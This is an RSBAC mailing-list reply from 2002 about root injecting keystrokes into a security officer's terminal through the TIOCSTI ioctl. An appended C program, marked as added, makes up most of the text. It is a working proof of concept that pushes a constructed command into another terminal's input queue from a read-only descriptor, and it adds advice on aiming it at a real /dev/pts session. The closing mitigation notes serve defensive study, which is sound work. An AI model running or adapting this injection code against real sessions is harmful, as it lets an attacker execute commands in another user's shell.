[rsbac] Protecting secoff from malicious root
Amon Ott
rsbac@rsbac.org
Mon Apr 8 12:31:01 2002
On Monday, 8. April 2002 13:14, Rafal Wojtczuk wrote:
> On Mon, Apr 08, 2002 at 10:46:51AM +0200, Amon Ott wrote:
> > > ioctl(secoffs_terminal_fd, TIOCSTI, ptr_to_char)
> >
> > Just fixed it for -pre6, please check it yourself. The ioctl now requires
> > WRITE_OPEN on the terminal device.
>
> When -pre6 appears in http://www.rsbac.org/pre/ I'll have a look. Anyway,
> with this fix, is root able to open /dev/pts/number read-write? This is
> needed for things like wall, write etc.
READ-WRITE-OPEN through standard open etc. has been fully controlled for a
long time. It is just a request for the device. The new stuff is just the
ioctl.
> I would disable TIOCSTI totally for rsbac.
Disabling might not work for some people. The current solution fits into the
standard RSBAC scheme with device access control.
Amon.
--
http://www.rsbac.org
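The TIOCSTI primitive quoted in the thread, as an added example that is not part of the original message or of RSBAC's own code. It shows on stock Linux what a process that merely holds an open descriptor on someone else's terminal can do: push bytes into that terminal's input queue as if they had been typed there. Stock Linux only asks that the descriptor refer to the caller's controlling tty or that the caller have CAP_SYS_ADMIN (root); it never checks whether the descriptor was opened for writing, which is why mapping the ioctl onto a WRITE_OPEN request on the device, as -pre6 does, is the natural RSBAC-side fix. The program is assumed to run on Linux with a devpts mount; the pseudo-terminal is private to the demo, the "id > /tmp/pwned" payload is a constructed string, and all function names are the example's own.

```c
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <termios.h>
#include <unistd.h>

/* Push every byte of s into the input queue of the terminal behind fd, one
 * TIOCSTI call per byte, exactly like the one-liner quoted in the thread.
 * Returns the number of bytes injected, or -errno on the first failure. */
int tiocsti_inject(int fd, const char *s)
{
    int n = 0;
    for (; *s; s++, n++) {
        char c = *s;                  /* TIOCSTI takes a pointer to one char */
        if (ioctl(fd, TIOCSTI, &c) < 0)
            return -errno;
    }
    return n;
}

/* TIOCSTI is a tty ioctl: on a descriptor that is not a terminal the kernel
 * answers ENOTTY before any permission logic runs.  Returns that -errno. */
int tiocsti_on_pipe(void)
{
    int p[2];
    if (pipe(p) < 0)
        return -errno;
    int rc = tiocsti_inject(p[1], "x");
    close(p[0]);
    close(p[1]);
    return rc;
}

/* Open a private pty pair with the raw Linux interface (no libutil needed):
 * /dev/ptmx yields the master, TIOCSPTLCK unlocks the slave, TIOCGPTN gives
 * its number.  slave_path receives "/dev/pts/N". */
static int open_pty_pair(int *master, int *slave, char *slave_path, size_t len)
{
    int unlock = 0, num;
    *master = open("/dev/ptmx", O_RDWR | O_NOCTTY);
    if (*master < 0)
        return -errno;
    if (ioctl(*master, TIOCSPTLCK, &unlock) < 0 || ioctl(*master, TIOCGPTN, &num) < 0)
        return -errno;
    snprintf(slave_path, len, "/dev/pts/%d", num);
    *slave = open(slave_path, O_RDWR | O_NOCTTY);
    return *slave < 0 ? -errno : 0;
}

/* Demonstration.  The parent plays the security officer's shell: it owns the
 * slave and reads from it.  The child plays the process run by malicious
 * root: it opens the same slave READ-ONLY, makes it its controlling tty (so
 * the demo also works without CAP_SYS_ADMIN) and injects payload.  Returns 0
 * if the parent read the payload back as terminal input, else a negative code. */
int demo_inject_on_pty(const char *payload, char *out, size_t outlen)
{
    int master, slave;
    char path[32];
    if (open_pty_pair(&master, &slave, path, sizeof path) < 0)
        return -1;

    struct termios t;                 /* raw mode: no line editing, no echo */
    tcgetattr(slave, &t);
    cfmakeraw(&t);
    tcsetattr(slave, TCSANOW, &t);

    pid_t pid = fork();
    if (pid < 0)
        return -2;
    if (pid == 0) {
        setsid();                     /* new session, no controlling tty yet */
        int ro = open(path, O_RDONLY);   /* no O_NOCTTY: becomes controlling tty */
        if (ro < 0)
            _exit(1);
        _exit(tiocsti_inject(ro, payload) < 0 ? 2 : 0);
    }
    int status;
    waitpid(pid, &status, 0);
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
        close(slave); close(master);
        return -3;                    /* the kernel refused the ioctl */
    }

    /* Victim side: the bytes now sit in the slave's input queue. */
    size_t want = strlen(payload), got = 0;
    struct pollfd pfd = { .fd = slave, .events = POLLIN };
    while (got < want && got < outlen - 1 && poll(&pfd, 1, 500) > 0) {
        ssize_t r = read(slave, out + got, outlen - 1 - got);
        if (r <= 0)
            break;
        got += (size_t)r;
    }
    out[got] = '\0';
    close(slave); close(master);
    return strcmp(out, payload) == 0 ? 0 : -4;
}

int main(void)
{
    char buf[128];
    const char *payload = "id > /tmp/pwned\n";   /* constructed demo payload */
    int rc = demo_inject_on_pty(payload, buf, sizeof buf);
    if (rc == 0)
        printf("read-only fd was enough; the victim shell would see: %s", buf);
    else
        printf("injection refused by the kernel (rc=%d)\n", rc);
    return rc == 0 ? 0 : 1;
}
```

Build with `cc -Wall tiocsti_demo.c -o tiocsti_demo` and run it as an ordinary user: the child never opens the terminal for writing, yet the parent reads the command line back as if the security officer had typed it. Against a real target the child would open `/dev/pts/N` of the secoff session instead of the demo pty and would rely on root's CAP_SYS_ADMIN rather than on making it the controlling tty. Two caveats a practitioner should know: with RSBAC -pre6 the child's `ioctl` is checked as a WRITE_OPEN request on the device, so the device ACL decides whether it goes through; and on mainline kernels from 6.2 on, the sysctl `dev.tty.legacy_tiocsti` (build option CONFIG_LEGACY_TIOCSTI) can disable the ioctl outright, in which case callers without CAP_SYS_ADMIN get EIO and `demo_inject_on_pty` returns -3, which is the "disable it totally" option from the thread now available upstream.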